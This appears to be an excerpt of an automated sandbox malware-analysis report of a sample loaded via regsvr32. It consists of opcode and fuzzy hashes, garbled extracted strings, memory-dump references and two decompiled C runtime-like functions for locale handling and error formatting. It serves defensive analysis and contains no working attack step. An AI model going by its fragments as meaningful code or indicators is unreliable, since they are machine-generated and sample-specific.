                                                                      • API String ID: 0-2774050066
                                                                      • Opcode ID: 54c0bc80f99e14aaaff5158503913d0680613f830ef7219470fb8a1fa6571806
                                                                      • Instruction ID: e52233c244945a30345b1d1f5909766ffca25e4e7f8c8ece2fd6f2a343240ca4
                                                                      • Opcode Fuzzy Hash: 54c0bc80f99e14aaaff5158503913d0680613f830ef7219470fb8a1fa6571806
                                                                      • Instruction Fuzzy Hash: B96147B8D0071DDFCB48DFA9C5495AEBBB0FB44348F1085A9D426EB264D7B89A44CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;`$q$q$W)
                                                                      • API String ID: 0-1972682526
                                                                      • Opcode ID: 566fdae3453702d648920d7b97c152342e3bf0ac8ca56037c34912d731436790
                                                                      • Instruction ID: 6dc3e97395e6be8f1d91e0089ae1c130e45ae4718a13a9d02ba5135c0babebf3
                                                                      • Opcode Fuzzy Hash: 566fdae3453702d648920d7b97c152342e3bf0ac8ca56037c34912d731436790
                                                                      • Instruction Fuzzy Hash: B471487490034E8BCF48CF68C88A1EE3FB1FB58398B214619E84AAB354D374D655CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Bt!$VXq$bW$z
                                                                      • API String ID: 0-3857380858
                                                                      • Opcode ID: 9d52838d3064b8b41fb38a0cb4a3ba1366c2e998d25bd6292789c5c4f6e3cec5
                                                                      • Instruction ID: 60479323a59afa71e655c77b644cbc310ada83c99f38c70525dec248651d9951
                                                                      • Opcode Fuzzy Hash: 9d52838d3064b8b41fb38a0cb4a3ba1366c2e998d25bd6292789c5c4f6e3cec5
                                                                      • Instruction Fuzzy Hash: 5E41E674D043098FCB08DFA5D48A4EEBFB1FB48358F15921DE91AB6260C7B89585CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ';F$GM$mR 4$|
                                                                      • API String ID: 0-2001149616
                                                                      • Opcode ID: 80fecb41e67418e49dff303cb53794baa8c1cc19330e31bd1fbd648a6344415a
                                                                      • Instruction ID: 3e89323f499be7f15a7aebe31feb6c6b5cc58d8f64021d83df605c02ebc75ee0
                                                                      • Opcode Fuzzy Hash: 80fecb41e67418e49dff303cb53794baa8c1cc19330e31bd1fbd648a6344415a
                                                                      • Instruction Fuzzy Hash: 9441B2B190034A8FCB48DF68C5864CE7FB1FB58398F118619E856AB250D3B496A4CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ao$)$!a$4L
                                                                      • API String ID: 0-2139488026
                                                                      • Opcode ID: d15c5817d15f002ded2632a407412a666ad39858a260ad5676d4a18a0f17a274
                                                                      • Instruction ID: 1967af871f1770ca527e7fd9566a8992114e3b4982029b11a58e260fa8c3b0fb
                                                                      • Opcode Fuzzy Hash: d15c5817d15f002ded2632a407412a666ad39858a260ad5676d4a18a0f17a274
                                                                      • Instruction Fuzzy Hash: 5131F7B490430A8FCB48CF64C99A59E7FB1FB58398F10461DF85A96350D3B496A4CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180050E44(void* __ecx, signed int __edx, void* __esi, void* __ebp, long long __rbx, void* __rcx, void* __rdx) {
                                                                      				void* __rsi;
                                                                      				signed int _t47;
                                                                      				int _t48;
                                                                      				void* _t49;
                                                                      				void* _t55;
                                                                      				signed int _t63;
                                                                      				signed int _t72;
                                                                      				signed int _t81;
                                                                      				signed int _t86;
                                                                      				signed long long _t124;
                                                                      				signed long long _t125;
                                                                      				void* _t131;
                                                                      				void* _t150;
                                                                      				signed int* _t151;
                                                                      				int _t153;
                                                                      				intOrPtr* _t154;
                                                                      				signed long long _t156;
                                                                      				signed long long _t157;
                                                                      				void* _t160;
                                                                      				signed long long _t161;
                                                                      				void* _t169;
                                                                      
                                                                      				_t144 = __rdx;
                                                                      				_t86 = __edx;
                                                                      				 *((long long*)(_t160 + 0x10)) = __rbx;
                                                                      				 *(_t160 + 0x18) = _t156;
                                                                      				_t161 = _t160 - 0x120;
                                                                      				_t124 =  *0x80072078; // 0xc949cbcab002
                                                                      				_t125 = _t124 ^ _t161;
                                                                      				 *(_t161 + 0x110) = _t125;
                                                                      				_t131 = __rcx;
                                                                      				E00000001180038680(_t125, __rcx, __rdx, _t153, _t169);
                                                                      				_t4 = _t125 + 0x98; // 0x98
                                                                      				_t154 = _t4;
                                                                      				E00000001180038680(_t125, _t131, _t144, _t154, _t150);
                                                                      				_t151 =  *((intOrPtr*)(_t125 + 0x3a0));
                                                                      				_t47 = E0000000118005151C(_t131, _t144);
                                                                      				r9d = 0x78;
                                                                      				_t72 = _t47;
                                                                      				asm("sbb edx, edx");
                                                                      				_t48 = GetLocaleInfoW(_t153, ??, ??);
                                                                      				r14d = 0;
                                                                      				if (_t48 == 0) goto 0x8005105e;
                                                                      				_t49 = E0000000118005A81C((_t86 & 0xfffff005) + 0x1002, _t125,  *((intOrPtr*)(_t154 + 8)));
                                                                      				_t157 = _t156 | 0xffffffff;
                                                                      				if (_t49 != 0) goto 0x80050f93;
                                                                      				_t11 = _t169 + 0x78; // 0x78
                                                                      				r9d = _t11;
                                                                      				asm("sbb edx, edx");
                                                                      				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x8005105e;
                                                                      				if (E0000000118005A81C(((_t86 & 0xfffff005) + 0x00001002 & 0xfffff002) + 0x1001, _t125,  *_t154) != 0) goto 0x80050f25;
                                                                      				_t151[1] = _t72;
                                                                      				goto 0x80050f8e;
                                                                      				if ((( *_t151 | 0x00000304) & 0x00000002) != 0) goto 0x80050f93;
                                                                      				if ( *((intOrPtr*)(_t154 + 0x14)) == r14d) goto 0x80050f6d;
                                                                      				_t55 = E00000001180056920(((_t86 & 0xfffff005) + 0x00001002 & 0xfffff002) + 0x1001, _t125,  *_t154);
                                                                      				if (_t55 != 0) goto 0x80050f6b;
                                                                      				_t81 =  *_t151 | 0x00000002;
                                                                      				_t151[2] = _t72;
                                                                      				 *_t151 = _t81;
                                                                      				if ( *((intOrPtr*)( *_t154 + (_t157 + 1) * 2)) != r14w) goto 0x80050f57;
                                                                      				if (_t55 !=  *((intOrPtr*)(_t154 + 0x14))) goto 0x80050f93;
                                                                      				_t151[1] = _t72;
                                                                      				goto 0x80050f93;
                                                                      				if ((_t81 & 0x00000001) != 0) goto 0x80050f93;
                                                                      				if (_t72 ==  *0x80064058) goto 0x80050f93;
                                                                      				if (r14d + 1 - 0xa < 0) goto 0x80050f7b;
                                                                      				_t151[2] = _t72;
                                                                      				 *_t151 = _t81 | 0x00000001;
                                                                      				if (( *_t151 & 0x00000300) == 0x300) goto 0x80051052;
                                                                      				r9d = 0x78;
                                                                      				asm("sbb edx, edx");
                                                                      				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x8005105e;
                                                                      				if (E0000000118005A81C((r14d + 0x00000001 & 0xfffff002) + 0x1001, 0x18006405a,  *_t154) != 0) goto 0x80051018;
                                                                      				_t63 =  *_t151;
                                                                      				asm("bts eax, 0x9");
                                                                      				 *_t151 = _t63;
                                                                      				if ( *((intOrPtr*)(_t154 + 0x18)) == r14d) goto 0x80050ff9;
                                                                      				asm("bts eax, 0x8");
                                                                      				 *_t151 = _t63;
                                                                      				goto 0x80051049;
                                                                      				if ( *((intOrPtr*)(_t154 + 0x14)) == r14d) goto 0x80050ff1;
                                                                      				if ( *((intOrPtr*)( *_t154 + (_t157 + 1) * 2)) != r14w) goto 0x80051002;
                                                                      				if (__ebp !=  *((intOrPtr*)(_t154 + 0x14))) goto 0x80050ff1;
                                                                      				goto 0x80051037;
                                                                      				if ( *((intOrPtr*)(_t154 + 0x18)) != r14d) goto 0x80051052;
                                                                      				if ( *((intOrPtr*)(_t154 + 0x14)) == r14d) goto 0x80051052;
                                                                      				if (E0000000118005A81C(1, 0x18006405a,  *_t154) != 0) goto 0x80051052;
                                                                      				if (E00000001180051470(_t72, 0, 0x18006405a, _t131,  *_t154, _t161 + 0x20, _t154) == 0) goto 0x80051052;
                                                                      				asm("bts dword [edi], 0x8");
                                                                      				if (_t151[1] != r14d) goto 0x80051052;
                                                                      				_t151[1] = _t72;
                                                                      				goto 0x80051066;
                                                                      				 *_t151 = r14d;
                                                                      				return E00000001180002FB0(1, _t72,  *(_t161 + 0x110) ^ _t161);
                                                                      			}
























                                                                      0x180050e44
                                                                      0x180050e44
                                                                      0x180050e44
                                                                      0x180050e49
                                                                      0x180050e52
                                                                      0x180050e59
                                                                      0x180050e60
                                                                      0x180050e63
                                                                      0x180050e6b
                                                                      0x180050e6e
                                                                      0x180050e73
                                                                      0x180050e73
                                                                      0x180050e7a
                                                                      0x180050e82
                                                                      0x180050e89
                                                                      0x180050e98
                                                                      0x180050ea0
                                                                      0x180050ea2
                                                                      0x180050eb0
                                                                      0x180050eb6
                                                                      0x180050ebb
                                                                      0x180050eca
                                                                      0x180050ecf
                                                                      0x180050ed5
                                                                      0x180050ede
                                                                      0x180050ede
                                                                      0x180050eeb
                                                                      0x180050f01
                                                                      0x180050f18
                                                                      0x180050f20
                                                                      0x180050f23
                                                                      0x180050f28
                                                                      0x180050f30
                                                                      0x180050f3e
                                                                      0x180050f47
                                                                      0x180050f49
                                                                      0x180050f4c
                                                                      0x180050f4f
                                                                      0x180050f5f
                                                                      0x180050f64
                                                                      0x180050f66
                                                                      0x180050f69
                                                                      0x180050f6f
                                                                      0x180050f7e
                                                                      0x180050f89
                                                                      0x180050f8e
                                                                      0x180050f91
                                                                      0x180050f9e
                                                                      0x180050fae
                                                                      0x180050fb6
                                                                      0x180050fcc
                                                                      0x180050fe1
                                                                      0x180050fe3
                                                                      0x180050fe5
                                                                      0x180050fe9
                                                                      0x180050fef
                                                                      0x180050ff1
                                                                      0x180050ff5
                                                                      0x180050ff7
                                                                      0x180050ffd
                                                                      0x18005100a
                                                                      0x18005100f
                                                                      0x180051016
                                                                      0x18005101c
                                                                      0x180051022
                                                                      0x180051033
                                                                      0x180051043
                                                                      0x180051045
                                                                      0x18005104d
                                                                      0x18005104f
                                                                      0x18005105c
                                                                      0x18005105e
                                                                      0x18005108d

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 1791019856-0
                                                                      • Opcode ID: 7723ff92f372f75df8fd91d37e101dd3367823b0a4369336bc045417b5db0a0f
                                                                      • Instruction ID: 23d7e7e255b820700c12e1061e2351df7842a77ec4b8ef30c87efa9013530e9e
                                                                      • Opcode Fuzzy Hash: 7723ff92f372f75df8fd91d37e101dd3367823b0a4369336bc045417b5db0a0f
                                                                      • Instruction Fuzzy Hash: C161AD722006498AEBB68F11E5503ED73A1F788B81F14C135FB9AA36D1DF7AD699C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @WE$];>$E
                                                                      • API String ID: 0-3693438973
                                                                      • Opcode ID: ed71cc169b0132331bb02baa98c2a3e8405eea1663a807d212a467da5c0a46c9
                                                                      • Instruction ID: 70414804d1f7db564042fd4770580f6dd718c8e72304d0bc4bd9625a14603b9a
                                                                      • Opcode Fuzzy Hash: ed71cc169b0132331bb02baa98c2a3e8405eea1663a807d212a467da5c0a46c9
                                                                      • Instruction Fuzzy Hash: 27E134759147988BCF48CFA8D89A4EEBBF1FB48748F10822DEC46A7650D7B09805CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (;$rz$xi
                                                                      • API String ID: 0-313796459
                                                                      • Opcode ID: 4a008361eac4dd1c602187239d030233ca403a67518b7cbd80a8edacdf7d4b94
                                                                      • Instruction ID: 23e0125966369b0100b8ff2a328f1e3a89903dcbea5bb389306eaaaf7438a415
                                                                      • Opcode Fuzzy Hash: 4a008361eac4dd1c602187239d030233ca403a67518b7cbd80a8edacdf7d4b94
                                                                      • Instruction Fuzzy Hash: FDB123709147189BCF88CFA8D9CA9DDBBF1FB48314F50521DE806AB250D774A885CF99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Hq$]="$h
                                                                      • API String ID: 0-2576050562
                                                                      • Opcode ID: 53910a567dbaecb0da2bffea10685d5acc71c39fb32037862a0e4617c1a0c114
                                                                      • Instruction ID: f0b6bb1d3c22a2fb7c9394b21e7f538988a5e17469dfa4da44374d3a6e8104af
                                                                      • Opcode Fuzzy Hash: 53910a567dbaecb0da2bffea10685d5acc71c39fb32037862a0e4617c1a0c114
                                                                      • Instruction Fuzzy Hash: FDC1367490034CCBCB48DF68C98A5EDBBF1FB48348F154619E85AAB350D7B89A44CF89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: l$xP>$un
                                                                      • API String ID: 0-3461298494
                                                                      • Opcode ID: e6642efffef6eb30a6956d0bf1bdd3302c4065af326c6ed68b0f5ef6f1e044ed
                                                                      • Instruction ID: c3fac259a40917f4973d1b1ec676f80717994618efabca18dd0fced332d15244
                                                                      • Opcode Fuzzy Hash: e6642efffef6eb30a6956d0bf1bdd3302c4065af326c6ed68b0f5ef6f1e044ed
                                                                      • Instruction Fuzzy Hash: 70E10774505B888FDBB8DF24CC89AEB7BA1FB5431AF10151FD849DA290EBB49648CF01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >FC$a `i$y5+
                                                                      • API String ID: 0-1688552518
                                                                      • Opcode ID: ada7921abd4bcabc16bf8340fb0b551dac13d95d2dffb0dcfe55049d6185cfe9
                                                                      • Instruction ID: a0d1f44da676867d790bf62ab531c89f00da4b15b21e5247e42d83fd3b6f59c2
                                                                      • Opcode Fuzzy Hash: ada7921abd4bcabc16bf8340fb0b551dac13d95d2dffb0dcfe55049d6185cfe9
                                                                      • Instruction Fuzzy Hash: 01C1F47490471D8FCB68CFA8C0855EEBBF1FB48308F10556AE81AEB261D7749A09CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 42$4Z2$K.M
                                                                      • API String ID: 0-880815871
                                                                      • Opcode ID: 7c800e0ed014ba46c309b21d0154368fb33225ed9e59b7918fff53a851102311
                                                                      • Instruction ID: 36d14b1c39aef4661a2d9ae2f9dcb5869dd4a0a681b0eba0f8505fd7f65cf593
                                                                      • Opcode Fuzzy Hash: 7c800e0ed014ba46c309b21d0154368fb33225ed9e59b7918fff53a851102311
                                                                      • Instruction Fuzzy Hash: 5EA13B75A0870C8BCF58DFA8D4894DDB7F1FB58348F00451EE80AF6290DB74994ACBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0>;$>+$YL
                                                                      • API String ID: 0-1761512064
                                                                      • Opcode ID: 80d39659b24abd22bc192217151730a4bda70fe7c09832c4d3e5ab7956f10aad
                                                                      • Instruction ID: e48e6bddecffa6b2658de434b22d703f6487c9af60517454840ee768fb7dc89b
                                                                      • Opcode Fuzzy Hash: 80d39659b24abd22bc192217151730a4bda70fe7c09832c4d3e5ab7956f10aad
                                                                      • Instruction Fuzzy Hash: 79910274D0471E8BCF48CFA8C58A5AEBBF0FB44308F50865AD52AF6260D7789A45CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E0000000118003D650(void* __ebp, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32, long long _a64) {
                                                                      				void* _t17;
                                                                      				long long _t32;
                                                                      				void* _t42;
                                                                      				void* _t45;
                                                                      				void* _t46;
                                                                      
                                                                      				_t46 = _t42;
                                                                      				 *((long long*)(_t46 + 8)) = __rbx;
                                                                      				 *((long long*)(_t46 + 0x10)) = __rbp;
                                                                      				 *((long long*)(_t46 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t46 + 0x20)) = __rdi;
                                                                      				r13b = r9b;
                                                                      				_t16 =  >  ? __ebp : 0;
                                                                      				_t17 = ( >  ? __ebp : 0) + 9;
                                                                      				if (__rdx - __rax > 0) goto 0x8003d6d8;
                                                                      				_t32 = _a64;
                                                                      				 *((long long*)(_t46 - 0x20)) = _t32;
                                                                      				r9d = 0;
                                                                      				 *(_t46 - 0x28) =  *(_t46 - 0x28) & 0x00000000;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t32 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t32 + 0x2c)) = 0x22;
                                                                      				E0000000118003AA20(__rax, __rbx, _t32, __rdx, __rsi, r8d, _t45);
                                                                      				return 0x22;
                                                                      			}








                                                                      0x18003d650
                                                                      0x18003d653
                                                                      0x18003d657
                                                                      0x18003d65b
                                                                      0x18003d65f
                                                                      0x18003d675
                                                                      0x18003d67e
                                                                      0x18003d681
                                                                      0x18003d689
                                                                      0x18003d68b
                                                                      0x18003d698
                                                                      0x18003d69c
                                                                      0x18003d69f
                                                                      0x18003d6a4
                                                                      0x18003d6a9
                                                                      0x18003d6ad
                                                                      0x18003d6b2
                                                                      0x18003d6d7

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -$e+000$gfff
                                                                      • API String ID: 0-2620144452
                                                                      • Opcode ID: 59e12d28b2cb2f2951d7c98d423b6ee40bf28a958a50c93b4993d770785e7f4d
                                                                      • Instruction ID: e0933d5976427c7d658adbe772612b986d37842e90e649b9730c02b0f97ec550
                                                                      • Opcode Fuzzy Hash: 59e12d28b2cb2f2951d7c98d423b6ee40bf28a958a50c93b4993d770785e7f4d
                                                                      • Instruction Fuzzy Hash: 597125327187C886E762CF25E84078A7791F349BD4F19C226EBA847B95DF39C649CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5$cyy$[B6
                                                                      • API String ID: 0-328552468
                                                                      • Opcode ID: f6b1eebf409fd1b0fc441a8e7bc6dfdc3df9d3d9bbcc8ed7f8fafc9887d0065d
                                                                      • Instruction ID: 9923306ca1a565b3f31f3998fcda5495ad1e7e43b5814df1a72dca3bc5a81258
                                                                      • Opcode Fuzzy Hash: f6b1eebf409fd1b0fc441a8e7bc6dfdc3df9d3d9bbcc8ed7f8fafc9887d0065d
                                                                      • Instruction Fuzzy Hash: 14B167B4A0030DCFCB98CF68D54A5DE7BB9FB45348F00412AEC0E9A264D7B4E618CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #M>o$Y.$Y.
                                                                      • API String ID: 0-963067216
                                                                      • Opcode ID: 5a8d2cc755e84069494449221e96db52187af361a94e3a94da3755345448785d
                                                                      • Instruction ID: 07e2f5f6dde8367ba84ca87667bf2081c2072d6b2398c5982ca8ec5b29c4cdd7
                                                                      • Opcode Fuzzy Hash: 5a8d2cc755e84069494449221e96db52187af361a94e3a94da3755345448785d
                                                                      • Instruction Fuzzy Hash: 4981037490470CAFCB48DF68C08A99EBBF2FB54308F40816EE849EB250D7759A59CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: v$%c$0B2
                                                                      • API String ID: 0-298353228
                                                                      • Opcode ID: cd09ce7eb6739b11c22130bd1d36ddfb4e119961b469e711cf2e02122138602a
                                                                      • Instruction ID: 013d51db26cb53aa5587282ad5f5caefc570ea0f0e46a9c64e7be2d098918529
                                                                      • Opcode Fuzzy Hash: cd09ce7eb6739b11c22130bd1d36ddfb4e119961b469e711cf2e02122138602a
                                                                      • Instruction Fuzzy Hash: 188140745043D88FDBB9DF18CCAA6EA3BA1FB49318F100619DE4DCE250DB745A84CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0KN$lJ$|
                                                                      • API String ID: 0-2791364588
                                                                      • Opcode ID: 4c528c9846ecef42e30d5439005b38be73b04e034474831cdca26393de46472a
                                                                      • Instruction ID: 4d52f63013cdf67887f6b23756cba26e80742667334b60f65fe6fbe67159cb22
                                                                      • Opcode Fuzzy Hash: 4c528c9846ecef42e30d5439005b38be73b04e034474831cdca26393de46472a
                                                                      • Instruction Fuzzy Hash: 4E81F8B411438CEBDB7EDF28C8866DA3BA9FB44704F108619EC2E8E260DB765745CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: h>$iU$bU
                                                                      • API String ID: 0-3529861082
                                                                      • Opcode ID: da48d062be1eb3069368477412672720cebe166894349350cfa808f995a9fd94
                                                                      • Instruction ID: 68e528099f413c638fa89e9eb3240a0853d0313c95d233edc3121080d88976aa
                                                                      • Opcode Fuzzy Hash: da48d062be1eb3069368477412672720cebe166894349350cfa808f995a9fd94
                                                                      • Instruction Fuzzy Hash: 09710D75605388CFDFB9CF24C8AA6DE7BA1FB5A308F50451DD98E8E250DB789644CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5SD$BI$_S\
                                                                      • API String ID: 0-2441048761
                                                                      • Opcode ID: 4fa00c27e9c77f4da4ce4352df7c8ed56ce479157c8228304bdcc6aaec41bed2
                                                                      • Instruction ID: 6335d86d884dcf4d4daf7c39759dcbc00a8dc9cf867224e1bddb3ab276aea2e3
                                                                      • Opcode Fuzzy Hash: 4fa00c27e9c77f4da4ce4352df7c8ed56ce479157c8228304bdcc6aaec41bed2
                                                                      • Instruction Fuzzy Hash: 19518CB490034E8FCB49CF64D48A4CE7FB0FB68398F615619E855A6210D3B496A4CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
